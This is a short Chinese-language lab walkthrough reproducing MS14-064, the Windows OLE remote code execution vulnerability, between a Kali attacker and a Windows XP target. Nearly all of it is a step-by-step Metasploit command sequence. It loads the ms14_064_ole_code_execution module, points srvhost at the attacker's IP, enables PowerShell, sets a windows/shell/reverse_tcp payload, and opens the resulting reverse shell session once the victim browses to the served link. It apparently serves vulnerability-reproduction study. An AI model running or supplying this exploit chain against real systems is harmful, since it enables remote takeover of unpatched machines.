MicrosoftWindowsOLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3——Win10+IE11全版本。
一 实验环境
靶机:windows xp
攻击机:kali
二 复现步骤
1 保证两台主机可以ping通
2 进入msfconsole,并查找ms14-064
msfconsole
search ms14-064
3 使用利用模块 exploit/windows/browser/ms14_064_ole_code_execution
use 0
使用 默认payload
4 查看选项
show options
5 设置服务器IP:192.168.2.101(kali的IP地址),允许调用power shell,设置payload
set srvhost 192.168.2.101
set AllowPowershellPrompt true
set payload windows/shell/reverse_tcp
6 目标的系统默认为windows xp
7 开始攻击
run
8 返回一个链接,并在windows xp的IE浏览器中打开
9 输入sessions
10 打开会话
sessions -i 1
11 解决Windows控制台乱码
chcp 65001
拿到目标主机的反弹shell